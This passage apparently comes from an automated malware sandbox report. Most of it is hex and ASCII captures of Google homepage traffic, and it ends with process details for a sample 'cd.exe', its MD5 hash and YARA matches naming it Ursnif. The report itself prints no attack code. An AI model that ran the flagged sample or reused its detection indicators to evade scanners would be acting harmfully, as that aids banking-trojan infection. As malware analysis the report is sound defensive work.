2c 33 2c 35 37
                                                                                                                                                                      Data Ascii: 841,4020,978,13228,3847,3776,416,6434,3930,448,12,866,12,5,7,13763,13,2762,919,5081,62,1531,1279,2212,530,149,1103,840,2196,4101,109,2003,1402,606,2025,1775,520,5766,257,6070,2577,3227,2845,7,4808,791,6755,5096,7540,3799,4981,908,2,941,2614,3783,9359,3,57
                                                                                                                                                                      2021-09-14 14:03:24 UTC165INData Raw: 2c 32 2c 32 2c 34 2c 32 2c 33 2c 33 2c 32 36 39 2c 35 32 30 2c 32 2c 32 32 2c 33 2c 34 2c 33 2c 32 33 36 35 34 33 30 33 2c 32 39 39 38 36 35 2c 34 30 34 31 33 35 32 2c 33 33 38 2c 33 2c 32 34 31 34 2c 34 34 38 2c 32 2c 34 36 33 2c 31 37 32 2c 34 30 36 2c 39 2c 33 32 33 35 2c 31 32 35 2c 31 31 35 33 2c 32 36 32 2c 39 32 36 2c 38 31 32 27 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 73 2e 65 6e 5f 47 42 2e 66 6a 6a 5f 46 7a 68 6b 75 4b 41 2e 4f 2f 61 6d 5c 78 33 64 52 4b 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 46 51 41 59 51 43 41 41 41 41 44 41 44 43 41 41 41 41 41 41 41 41 43 41 41 41 68 49 50 4a 69 51 41 41 41 41 43 41 4d 69 38 46 44 41 41 41 41 41 43 67 41
                                                                                                                                                                      Data Ascii: ,2,2,4,2,3,3,269,520,2,22,3,4,3,23654303,299865,4041352,338,3,2414,448,2,463,172,406,9,3235,125,1153,262,926,812';})();(function(){var u='/xjs/_/js/k\x3dxjs.s.en_GB.fjj_FzhkuKA.O/am\x3dRKAAAAEAAAAAAAAAAAAFQAYQCAAAADADCAAAAAAAACAAAhIPJiQAAAACAMi8FDAAAAACgA
                                                                                                                                                                      2021-09-14 14:03:24 UTC167INData Raw: 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 61 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 29 3f 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7c 7c 22 22 3a 22 22 29 26 26 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 64 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 67 6f 6f 67 6c 65 2e 70 73 61 3d 21 30 7d 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 29 7d 2c 30 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 78 6a 73 75 3d 27 2f 78 6a 73 2f 5f 2f 6a 73 2f 6b 5c 78 33 64 78 6a 73 2e 73 2e 65 6e 5f 47 42 2e 66 6a 6a
                                                                                                                                                                      Data Ascii: |void 0===d?void 0:d.call(a,"script[nonce]"))?b.nonce||b.getAttribute("nonce")||"":"")&&c.setAttribute("nonce",d);document.body.appendChild(c);google.psa=!0};setTimeout(function(){m()},0);})();(function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.fjj


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.649752142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:24 UTC167OUTGET /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
                                                                                                                                                                      2021-09-14 14:03:24 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 13504
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-09-14 14:03:24 UTC168INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 20 00 00 00 b8 08 06 00 00 00 da 23 57 1b 00 00 34 87 49 44 41 54 78 01 ec dd 03 90 25 3f 1e c0 f1 9c 6d db b6 7d af 93 c1 d9 28 9d 59 3a 9b af 6e 92 f4 7a ff b6 6d db b6 ed fb db 77 83 24 3d eb d7 97 9c d7 bb f3 5e bf 99 e9 fe 4e d5 67 8d 9e d2 7c ab 93 5f 22 f8 58 fd a3 d5 2e 1f fd e9 76 f9 c4 c1 b9 a3 4f 1b 5a d0 79 d2 bb 76 2a 1f 23 ca f2 11 91 00 80 1e 01 d0 94 4f 34 85 84 1c f1 6f 52 d6 7d 59 e6 e1 97 ca 86 ed 94 f5 c7 66 d6 5f 94 69 7f 5b a6 c3 78 66 dd 2a 65 43 b9 6e 6e 49 74 9f b4 e1 ea e8 0c a9 c3 01 ca f8 39 ca 16 3f 94 79 18 6e cd 2d 5e dc e0 50 01 00 80 00 69 b7 cb 47 a6 d8 90 36 7c 5f 5a bf 87 32 ee ca cc ba 65 29 24 2a a5 c3 68 74 a6 32 61 b1 b4 ee 8b ca fa e7 45 62 75 00 00 a0 36 9f
                                                                                                                                                                      Data Ascii: PNGIHDR #W4IDATx%?m}(Y:nzmw$=^Ng|_"X.vOZyv*#O4oR}Yf_i[xf*eCnnIt9?yn-^PiG6|_Z2e)$*ht2aEbu6
                                                                                                                                                                      2021-09-14 14:03:24 UTC169INData Raw: e7 8c 3f 43 59 7f c1 ec f9 e2 ed 83 32 ee 7e 69 c3 cd d2 b8 cb e3 f7 e7 28 eb cf 53 d6 5d 92 ee 68 49 bf a7 b4 5b 3e 0b 22 64 a5 cc c3 d7 23 01 00 35 46 80 ac 8d 00 51 d6 3f 2f d3 e1 aa 19 38 39 b2 3c d3 fe fc 74 b2 a8 cc c3 2f 95 29 3e 13 a7 72 5e fb ae 9d ca c7 44 62 63 d2 f8 70 3a 91 34 6d a6 95 d6 7f 55 1a ff 97 e8 88 34 16 3b 83 46 74 0b 46 74 01 34 00 01 b2 3a 02 a4 35 3f 3c 3f 6d 8a 9c 21 5f 8c 57 65 d6 5f a4 8c 9f 23 f3 30 9c 96 84 22 d1 6b 29 4c a4 9e 7c 59 7a f3 a0 74 d8 2f ed c7 20 3e 00 80 00 41 9f 02 64 a8 ed 9f 9b 96 2b a6 7f 34 d5 5d ae 8c ff 69 7a 9e 48 f4 5b da 78 2b b5 57 d2 fa 5d 32 1b 26 88 8f d5 01 00 01 82 9e ee f9 98 ce 65 97 4c 87 71 a9 c3 c2 81 11 ff 96 48 cc 14 e9 ad 8b cc c3 b7 53 14 11 1f 00 40 80 f4 10 01 d2 6a 97 8f 57 36 9c
                                                                                                                                                                      Data Ascii: ?CY2~i(S]hI[>"d#5FQ?/89<t/)>r^Dbcp:4mU4;FtFt4:5?<?m!_We_#0"k)L|Yzt/ >Ad+4]izH[x+W]2&eLqHS@jW6
                                                                                                                                                                      2021-09-14 14:03:24 UTC170INData Raw: 44 6b 0f e7 df 02 01 20 5f 6e ba ac db d3 5a 73 38 02 87 eb 10 48 bc 8d a0 e2 1b 7c 9f d7 c0 c7 e2 63 f2 b1 f9 37 f8 b7 40 00 c8 17 9f ba 78 db ba c6 f4 05 08 38 1e c1 18 bb 50 67 ac 4e bf 81 c7 6b 62 7f 2e 67 54 a9 f6 2b a1 a6 22 c1 9d 30 26 fd 02 e3 dc 0c 04 1a 69 a5 31 0e 02 ed c9 48 e0 6f a9 58 e8 84 72 8f 6f c2 03 d5 5f 92 5b 8b 0d e2 b4 03 90 70 63 77 10 c4 e7 1b 0c ce 4c 60 a6 e2 34 cc 5e 4c 87 e5 3c 91 ec 80 3b 88 65 1d d1 e0 a3 c9 58 ed 29 ed f5 7b ac 05 52 89 38 33 b1 a2 a5 fa d4 65 2d d5 8f 21 48 58 c6 60 c1 0e fc 5b f0 28 fe f6 29 b9 99 b2 16 48 25 62 6b 8c 48 53 fa 7c cc 74 3c cf 71 d5 b0 77 d1 05 fd c7 63 a7 a5 d6 01 e9 87 76 c7 74 29 81 e7 02 90 ce fd 46 6d 81 d9 8a df f3 26 c8 96 31 0e 33 c2 b8 d9 ba 37 19 0f ed 97 6f 90 ff 01 b1 13 0f 84
                                                                                                                                                                      Data Ascii: Dk _nZs8H|c7@x8PgNkb.gT+"0&i1HoXro_[pcwL`4^L<;eX){R83e-!HX`[()H%bkHS|t<qwcvt)Fm&137o
                                                                                                                                                                      2021-09-14 14:03:24 UTC172INData Raw: 03 10 14 45 aa 03 19 2c 64 4d ff 90 0d dd fc 00 64 b5 2c 72 b4 fd 07 b1 03 db e4 eb 37 8f 73 75 4e c8 52 b6 fd 07 b1 0b fb a9 f8 81 85 f7 03 10 b6 bb af d8 71 0d 5d c9 07 52 7a 40 58 2e 5d ff 43 94 3e 1a c4 c5 2a 3e 00 61 ef 07 90 c1 58 10 0f 6c 8b 0f 67 0a f2 be d5 05 3a e6 87 6b b7 06 31 29 37 63 d8 36 b8 e0 76 fa 81 c7 9a 05 cb 72 4f 0e df 1a c4 34 b4 cd 3f ca 0f 2a bc 1f 80 e0 bc fe 01 64 2a 7c 5c bb 03 a4 14 12 49 2c 1a ab 5f 03 24 bb 3f 88 9b f9 01 48 a6 11 64 a0 b8 05 0d 33 1f 2f 97 b1 84 f0 6c 2c fd cc 40 d9 e3 9b 50 04 a8 11 11 fa 1f 89 df f3 67 28 9d 3e 13 bf 33 a7 7c 77 0c c1 17 99 ac 06 62 c4 ab 52 8d f2 e4 2f 95 31 e9 73 36 82 9f 19 2c ef 8e e7 d1 88 04 d8 3f 12 bf e7 cf d0 d6 7f 26 7e 67 4e 19 03 91 17 f9 1e 81 98 12 9b bc e8 07 56 8b 8b 32
                                                                                                                                                                      Data Ascii: E,dMd,r7suNRq]Rz@X.]C>*>aXlg:k1)7c6vrO4?*d*|\I,_$?Hd3/l,@Pg(>3|wbR/1s6,?&~gNV2
                                                                                                                                                                      2021-09-14 14:03:24 UTC173INData Raw: c0 34 e1 5f 40 dc cb 9f 01 81 85 20 45 32 b6 ed 96 bb 5c e6 c4 42 1b 81 38 c1 bc fd f7 da 04 77 29 1f 19 da 96 3b c9 71 db 6e b1 cb 25 d7 22 1b 81 38 c2 74 d9 04 4b 32 1f 19 9a 09 99 04 32 10 13 ee ce 57 21 10 ff 84 e7 8e 57 5b 5b f0 35 a2 af d3 c3 95 1e 80 60 e9 60 a4 d7 7a 45 59 38 fb a2 3c a3 f3 71 a1 a5 24 1e 44 bd 58 4e 22 fb 77 10 57 f3 67 40 3a 41 8a 31 f7 e0 c0 08 66 6b 1b 48 64 ea e4 d2 07 88 93 b0 d0 8f 89 d7 8b 29 d0 af 07 92 5c cb 84 50 e4 31 7c 6d 20 37 a2 93 4b 1f 20 0e f3 3d 14 32 5b 60 e0 f5 7e 3d d0 e4 da ba c6 ee c3 4c 9c 87 2c 1a 06 e2 14 63 a7 a5 d6 c1 f3 fa b0 92 03 10 2c 35 df 68 20 00 b9 06 a4 7c ac 65 98 e0 58 e4 f1 f5 e8 be b6 da 83 40 7a c3 83 30 ab 5a b9 14 fb 2b 7e 29 76 b7 4b cf 03 29 06 4e c8 53 4d ec 76 c1 45 3e 0e e2 44 3c
                                                                                                                                                                      Data Ascii: 4_@ E2\B8w);qn%"8tK22W!W[[5``zEY8<q$DXN"wWg@:A1fkHd)\P1|m 7K =2[`~=L,c,5h |eX@z0Z+~)vK)NSMvE>D<
                                                                                                                                                                      2021-09-14 14:03:24 UTC174INData Raw: 52 08 3b df 56 f2 f2 8b a5 3e b1 64 07 af 07 20 0c 18 34 67 06 b8 6c 0b 52 0a 26 95 62 8c f9 21 12 4a ff a5 5f ad 54 65 a7 cb d3 d8 15 78 6c 29 e3 b8 f0 40 9c 4e 44 34 db ae be 1d 37 91 39 16 c4 2c 1f 06 c3 9f 29 16 21 cb f2 f3 00 d2 17 56 ee 63 cd 0a c5 0f 70 33 88 9b f1 04 d4 ec 8a 99 0f 04 aa 41 7a 83 1a 18 43 59 b3 42 31 f1 b2 19 c4 cd 34 0b b2 21 98 59 91 7f 55 aa 41 fa 82 04 d4 49 ca 63 65 1c c4 6d 58 74 b2 ae 31 3d d7 d3 01 48 34 74 96 e2 2e b7 0f 41 8a c5 26 71 c8 3f 39 1f cf e1 1d 07 06 1d 69 7c bd b6 bd 3e b8 1b 48 a9 78 b0 f0 84 ba 4d 3b 00 61 f3 22 10 b3 7c 78 af ef b5 b3 94 3e fb a1 28 6f 49 6b 04 71 33 b6 d4 87 bc 96 42 7d 70 d8 0f 45 b9 f2 69 23 88 cb 5d a2 f9 9e f4 d7 07 47 3b 6f ce cd 49 fb b8 01 7a c8 cb 01 08 97 14 14 8b 8f 3d 0c d2 9f
                                                                                                                                                                      Data Ascii: R;V>d 4glR&b!J_Texl)@ND479,)!Vcp3AzCYB14!YUAIcemXt1=H4t.A&q?9i|>HxM;a"|x>(oIkq3B}pEi#]G;oIz=
                                                                                                                                                                      2021-09-14 14:03:24 UTC175INData Raw: 13 ec 04 53 b3 20 6c e1 6c f5 1b 29 99 0f 6d c0 d3 af 29 57 ac 9d 37 e1 ee 7c 15 48 31 90 b7 b1 b7 6e d5 cf e0 39 20 6e 86 d7 f1 13 c8 6b 99 1f 0d d4 82 f4 06 cb 00 7b eb 2e 37 54 9f 03 e2 6e 43 7e a2 bc 0b a6 16 a4 2f 8a 95 50 21 fd 25 88 5b e1 5a 31 d5 d3 01 48 2c 78 a9 0b 82 8e 2c ab ac 76 44 47 ef 01 e2 06 05 ff 23 2f 48 f8 3f f9 5d c8 9b 80 3b e9 5f 80 94 c6 87 d9 8f d3 f5 67 a5 b2 97 83 14 8b 85 c3 94 b7 9c 5e 0f e2 66 2c d7 ac bb 2c b5 f7 a6 20 bd 61 e1 30 cd 8b 2d 5c 0f e2 6e 55 b7 a9 d6 46 99 29 9b 82 f4 05 77 fd 7f d3 3c 07 dd 5c ac 91 b9 7d 5e 0e 40 f4 6e 2e f4 25 63 81 f7 30 43 73 e1 fc fd 6b d7 05 71 13 1e 0a 8a 36 75 1f 6e 2c 17 24 91 5e 8e 7c 86 5a 90 e2 f8 c2 0d e9 8d f1 de a5 0c f4 ec d9 05 a4 58 4c 64 c2 16 ae c5 7a 01 48 e0 0d 10 37 53
                                                                                                                                                                      Data Ascii: S ll)m)W7|H1n9 nk{.7TnC~/P!%[Z1H,x,vDG#/H?];_g^f,, a0-\nUF)w<\}^@n.%c0Cskq6un,$^|ZXLdzH7S
                                                                                                                                                                      2021-09-14 14:03:24 UTC177INData Raw: 57 f3 af 4a 35 88 13 e5 a6 cb 50 bc ee 77 d4 5f 37 66 54 40 4a c1 59 61 13 37 0c 98 59 09 83 38 11 b6 de de c1 e7 58 69 01 c8 ac 31 63 86 1b d9 8e 1b 09 fd 10 c4 b1 62 a1 1f ac 76 a3 99 49 45 03 e7 2a cc 86 e0 30 40 d8 86 39 ac 70 37 56 fd bc 10 b6 7c 06 f1 a2 d8 94 ec 48 2c 8b bc 67 fa 7d c4 df 98 cf 6a aa 20 5a d8 17 c6 50 27 c7 8b 41 9c a7 97 c4 53 bd 9e 38 21 90 52 58 7d 61 0c b8 18 c4 89 ac c4 53 6d 78 2f 43 20 a5 42 32 e6 83 06 9a 76 ce e6 4c 03 88 b3 64 0f e6 f3 ab c4 00 84 b0 f4 7a a3 81 00 e4 b3 d4 d8 b1 eb 80 38 d0 3a 58 2a 7a 77 8d e7 ac 30 1b c2 c3 80 31 f2 b7 76 68 d8 b4 24 93 43 bd 90 1b ac 9e 09 5e c0 5d 28 78 6d 13 59 96 de 8e f7 10 59 fb 47 82 68 62 24 cc ad 63 66 b2 c3 03 c7 83 38 0a 6a 74 98 78 ad ac 2c 3b a0 bb 0a ec d8 c0 9d f8 eb 26
                                                                                                                                                                      Data Ascii: WJ5Pw_7fT@JYa7Y8Xi1cbvIE*0@9p7V|H,g}j ZP'AS8!RX}aSmx/C B2vLdz8:X*zw01vh$C^](xmYYGhb$cf8jtx,;&
                                                                                                                                                                      2021-09-14 14:03:24 UTC178INData Raw: 39 2c 0c ef b9 3e 96 62 e6 da d6 ba 1a eb 95 c9 78 f0 48 46 f1 20 03 c1 8a ae c9 68 e0 68 3b 5b 6e b3 e9 1c d7 5b 41 34 61 d9 62 7d 04 07 73 ed b8 80 5b 6d fc 7b 9a 6b 8e 64 71 30 90 81 60 45 57 94 95 3f 1a 8f d5 62 cb f3 b6 9a ce b5 c8 7a 20 da 70 0e 9e 69 67 82 39 ab 27 0f a6 66 08 73 4b 30 73 73 0a ca 2a bc 5a fc df f6 03 10 60 d0 7f be 4d 63 46 06 63 dd d5 5c 26 19 ec 76 5d 96 7f e7 8e 1b d6 1f b1 ab c3 6f 6f 15 9e 79 30 06 17 ea 9f 96 e5 43 ec 9b 08 52 4e 1d f1 50 cc 2a 53 6e 17 56 28 e4 94 28 07 84 54 64 74 a0 9f 5c 91 11 2c a5 ce e4 52 cc a4 dc 6b ec 2e a6 40 a2 59 2a 16 a8 03 31 01 b3 20 31 ab 4c b9 8d 81 c8 22 2c 41 dc 8d 0b fb f9 cb 9f a8 0e f4 93 2b 32 82 a5 d4 99 5c 8a 60 e9 5e 3c d7 b4 ad cf 95 ef 4d 4b 55 1d 88 09 bc 09 63 ab 7e bb 6f ac f0
                                                                                                                                                                      Data Ascii: 9,>bxHF hh;[n[A4ab}s[m{kdq0`EW?bz pig9'fsK0ss*Z`McFc\&v]ooy0CRNP*SnV((Tdt\,Rk.@Y*1 1L",A+2\`^<MKUc~o
                                                                                                                                                                      2021-09-14 14:03:24 UTC179INData Raw: 1b f0 44 05 04 1f 0b 71 32 4f e5 5d 11 48 a5 61 ff 98 64 2c f0 9e 1b ef 04 ac be 2e 6e c6 fe 31 f0 9e fb 82 8f aa b7 ad be 2e 6e 56 9f 58 b2 03 f2 bc 1e 71 76 c5 e5 cc fd f1 a9 0b d6 03 b1 f8 01 48 e9 58 1b 09 33 90 ff 76 e3 16 5b 76 0b 07 d1 c0 83 6b c4 a6 64 47 e2 04 b8 81 ad ae 3d b6 d4 f2 11 ef 80 c2 0d c9 b5 41 2a 19 73 43 52 b1 e0 39 2c 5c e6 8a ed b5 d1 da 33 75 73 3d ca 9f 1b b2 bc a5 fa 1c 37 14 2e e3 f6 5a 2c 1f 9d 69 e5 7a 78 45 5d 63 f6 20 b6 c3 77 dc 72 70 63 f6 0c 2e 91 83 ac 46 2f 00 49 a4 97 83 94 c0 b5 01 88 25 19 0f 8c c3 0d cc b3 2e 08 3c 3e 41 95 d7 63 ac 2e bc 5a 70 70 1f b6 8e c6 ac c8 a9 58 87 9c 89 3e 0b 2b dc 59 cb 23 9b c6 89 7b 4b 24 b1 68 ec 9a 27 b5 8f d3 7b ab b2 c7 3f 76 60 92 e9 87 2c b9 6c b5 97 f6 22 b6 d6 c7 05 fe 3c cc
                                                                                                                                                                      Data Ascii: Dq2O]Had,.n1.nVXqvHX3v[vkdG=A*sCR9,\3us=7.Z,izxE]c wrpc.F/I%.<>Ac.ZppX>+Y#{K$h'{?v`,l"<
                                                                                                                                                                      2021-09-14 14:03:24 UTC181INData Raw: 00 20 93 46 e5 e0 96 e1 60 89 b1 63 fe 52 88 59 b8 d3 02 d5 13 b4 bf 21 5e 02 e2 76 0c 54 bd 80 20 00 40 c5 1a f9 4f d3 85 d7 47 24 da bf f3 1f 4b e0 86 cb 1a 87 40 75 b3 cc b8 59 13 63 47 c4 4a 40 d6 d7 43 e7 0e 54 bd 80 20 00 40 45 64 bf 8a ec a1 92 eb 95 81 d7 43 d8 7b bb 7d 8f 94 ac a5 88 95 7c c8 1e ad 40 a1 7e 08 42 44 00 b0 e1 79 63 27 95 a2 d2 4c fb 67 06 31 13 63 af 40 75 a3 ac 18 32 a7 74 ad 44 4c 40 ce 6a 2d d6 20 01 01 00 f4 17 95 16 ce 94 45 a5 2d 2b b7 d4 1a bb 44 a0 ba 8f bf 33 68 c6 92 6a bb 4e a0 50 3f 04 01 00 06 a9 ef 64 bf 61 59 54 1a 8d f6 ef ad 9f ff 3c 43 a0 ba 45 9f 76 bb c4 fb 1f 85 fd 32 cf 9b 13 04 0a f5 43 10 00 60 90 d6 3b 63 ec 94 89 f1 3f c8 a1 1a 53 a2 dd 73 b2 6a 3f 50 9d 96 19 b7 4c 59 cb 12 4d e1 cf 0e 14 ea 89 20 c4 00
                                                                                                                                                                      Data Ascii: F`cRY!^vT @OG$K@uYcGJ@CT @EdC{}|@~BDyc'Lg1c@u2tDL@j- E-+D3hjNP?daYT<CEv2C`;c?Ssj?PLYM


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.649755142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:24 UTC182OUTGET /gen_204?ei=rKtAYY2rHY25kwWZrp3YAw&vet=10ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQhJAHCBQ..s&gl=GB&pc=SEARCH_HOMEPAGE&isMobile=false HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
                                                                                                                                                                      2021-09-14 14:03:24 UTC182INHTTP/1.1 204 No Content
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Server: gws
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      8192.168.2.649757142.250.102.106443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-09-14 14:03:24 UTC183OUTGET /images/searchbox/desktop_searchbox_sprites318_hr.png HTTP/1.1
                                                                                                                                                                      Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                                                                                                      Referer: https://www.google.com/?gws_rd=ssl
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cookie: CONSENT=PENDING+509
                                                                                                                                                                      2021-09-14 14:03:24 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      Content-Length: 779
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Expires: Tue, 14 Sep 2021 14:03:24 GMT
                                                                                                                                                                      Cache-Control: private, max-age=31536000
                                                                                                                                                                      Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      Server: sffe
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-09-14 14:03:24 UTC183INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 7c 08 03 00 00 00 2c 3f 02 be 00 00 00 7b 50 4c 54 45 00 00 00 9f 9f 9f 9b a1 a7 9b a0 a6 9a a0 a5 9a a0 a6 9b a0 a6 9a a0 a6 9a 9f a5 9b a0 a6 9a a0 a6 95 9f a5 99 a0 a6 97 9f 9f 99 9f a4 97 9f a5 9a 9f a6 9a a0 a6 97 9f a7 9b a0 a8 9a a0 a7 99 9f a5 97 9f a3 9a a0 a6 9c a5 ad 98 9f a7 99 9f a6 99 9f a6 99 9f a6 9a a0 a5 9a 9f a5 9c a1 a6 9a a0 a6 9b 9f a3 99 9f a3 9a 9f a5 98 9f a5 9a a1 a8 97 9f a7 9c 9f a6 9a a0 a7 19 ac ba 35 00 00 00 29 74 52 4e 53 00 10 7f bf ef ff cf af 60 8f df 30 af 20 70 60 90 cf 20 8f 9f 80 40 bf 1f b0 70 a0 50 9f 90 5f ef 40 50 30 90 6f 40 50 bf 7c 3a 38 a2 00 00 02 16 49 44 41 54 78 01 ed d6 87 92 da 30 10 80 61 0b fb a7 2c 27 cb f8 84 2e 39 6a 7a de ff 05
                                                                                                                                                                      Data Ascii: PNGIHDR(|,?{PLTE5)tRNS`0 p` @pP_@P0o@P|:8IDATx0a,'.9jz
                                                                                                                                                                      2021-09-14 14:03:24 UTC184INData Raw: 59 0d 6e 5d b9 41 7e 2a ba 6a 90 50 74 2a 4b 4e 65 d1 a9 2c 3a 95 27 d3 b5 ea 4a b9 4d d1 a9 fc ac ee ef eb de 57 74 dc 23 29 5b c1 b9 77 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                      Data Ascii: Yn]A~*jPt*KNe,:'JMWt#)[wIENDB`


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:16:02:47
                                                                                                                                                                      Start date:14/09/2021
                                                                                                                                                                      Path:C:\Users\user\Desktop\cd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:'C:\Users\user\Desktop\cd.exe'
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:3922432 bytes
                                                                                                                                                                      MD5 hash:CD02E745A08DD29CB6FDA1761B2F4B6E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
